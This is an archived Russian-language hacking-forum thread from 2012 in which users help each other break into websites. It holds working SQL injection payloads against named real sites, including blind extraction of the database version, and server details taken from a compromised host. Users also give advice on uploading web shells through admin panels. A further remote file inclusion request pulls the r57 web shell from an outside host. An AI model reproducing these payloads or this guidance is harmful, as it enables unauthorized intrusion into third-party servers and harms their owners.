ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
26.01.2012, 23:34
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Такой вопрос,
Сообщение от None
http://britishcat.ru/articlees5314+union+select+1,2,3,4.html
Скуля там или нет? если да то правильно ли я её разкручиваю(ну в смысле подбора колонок) |
|
|
|
27.01.2012, 00:42
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от qaz
qaz said:
Такой вопрос,
Скуля там или нет? если да то правильно ли я её разкручиваю(ну в смысле подбора колонок)
Скуля однозначно
Код:
Code:
http://britishcat.ru/articlees5354/**/and/**/1=1.html TRUE
http://britishcat.ru/articlees5354/**/and/**/1=2.html FALSE
http://britishcat.ru/articlees5354/**/and/**/1=1/**/group/**/by/**/1.html
Крути как слепую
Код:
Code:
http://britishcat.ru/article_s5354&post=104817/**/and/**/substring((@@version),1,1)=5.html TRUE
http://britishcat.ru/article_s5354&post=104817/**/and/**/substring((@@version),1,1)=4.html FALSE
|
|
|
27.01.2012, 01:17
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от qaz
qaz said:
Народ, помогите разкрутиить скулю, никак не могу подобрать количество колонок
Код:
Code:
Цhttp://www.gorod-dolgoprudny.ru/auto_ads.php?aid=7'
Ничё интересного там нет... Прав на запись тоже...
Код:
Code:
FreeBSD cl1108.azar-a.net 8.2-RELEASE-p3 FreeBSD 8.2-RELEASE-p3 #0:
1004 ( apache ) Group: 1003 ( apache )
5.2.17
Safe mode: OFF
/home/admin/domains/gorod-dolgoprudny.ru/public_html/ drwxr-xr-x
|
|
|
|
27.01.2012, 02:49
|
|
Guest
Сообщений: n/a
Провел на форуме:
2435
Репутация:
0
|
|
Имею дело с самописным мини-движком, имею доступ в админ-панель где можно добавлять категории, юзеров и редактировать новости, когда редактирую новости имею возможность управлять с исходным кодом страницы html, решил вставить туда шелл но открывается Bad Request. КАК можно использовать имея доступ к html?
|
|
|
|
27.01.2012, 03:19
|
|
Guest
Сообщений: n/a
Провел на форуме:
290351
Репутация:
173
|
|
Сообщение от h.elg
h.elg said:
Имею дело с самописным мини-движком, имею доступ в админ-панель где можно добавлять категории, юзеров и редактировать новости, когда редактирую новости имею возможность управлять с исходным кодом страницы html, решил вставить туда шелл но открывается Bad Request. КАК можно использовать имея доступ к html?
если там только html то никак, ищи другие возможности, качалки там разные, в редакторах обычно качалка шела есть
|
|
|
|
27.01.2012, 04:28
|
|
Guest
Сообщений: n/a
Провел на форуме:
26362
Репутация:
1
|
|
BigBear через фото галерею шелл запилил?
|
|
|
|
27.01.2012, 11:48
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от Iggy
Iggy said:
BigBear
через фото галерею шелл запилил?
нет, не через фотогалерею.
|
|
|
|
27.01.2012, 18:01
|
|
Guest
Сообщений: n/a
Провел на форуме:
6075
Репутация:
0
|
|
Решил научиться php injection но у меня чето не получается залить шелл, уверен что делаю какую то мелочь не так поэтому не получается но что не так не знаю.
Есть тренировочный сайт DVWA , в разделе File Inclusion в строке http://localhost/denwer/dvwa/vulnerabilities/fi/?page=include.php после page как описано в статье вставляю свой шелл вот так http://localhost/denwer/dvwa/vulnerabilities/fi/?page=http://msp.hut4.ru/r57shell и вместо шелла мне показывает ошибки :
Если я пишу любое слово после page= то показывает ошибки :
Или здесь не возможен php include ? потомучто всместо слова include должно быть main ?
Только прошу пожалуйста не трогайте мой сайт msp пока я еще не разобрался , мне он нужен для тренировок )
Помогите пожалуйста , очень хочу научиться. Поидее в DVWA на легком уровне должно все работать.
Спасибо. |
|
|
|
27.01.2012, 19:03
|
|
Guest
Сообщений: n/a
Провел на форуме:
2435
Репутация:
0
|
|
Нашел там прикрепить фотографию к новосте, открывается страница uploadp.php, пробовал загрузил шелл, пишет unable to move file...
|
|
|
|
27.01.2012, 19:36
|
|
Guest
Сообщений: n/a
Провел на форуме:
124363
Репутация:
11
|
|
Сообщение от NZT
NZT said:
Решил научиться php injection но у меня чето не получается залить шелл, уверен что делаю какую то мелочь не так поэтому не получается но что не так не знаю.
Есть тренировочный сайт DVWA , в разделе File Inclusion в строке http://localhost/denwer/dvwa/vulnerabilities/fi/?page=include.php после page как описано в статье вставляю свой шелл вот так http://localhost/denwer/dvwa/vulnerabilities/fi/?page=http://msp.hut4.ru/r57shell и вместо шелла мне показывает ошибки
Если я пишу любое слово после page= то показывает ошибки
Или здесь не возможен php include ? потомучто всместо слова include должно быть main ?
Только прошу пожалуйста не трогайте мой сайт msp пока я еще не разобрался , мне он нужен для тренировок )
Помогите пожалуйста , очень хочу научиться. Поидее в DVWA на легком уровне должно все работать.
Спасибо. подставляй http://msp.hut4.ru/r57shell.php или http://msp.hut4.ru/r57shell.txt?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
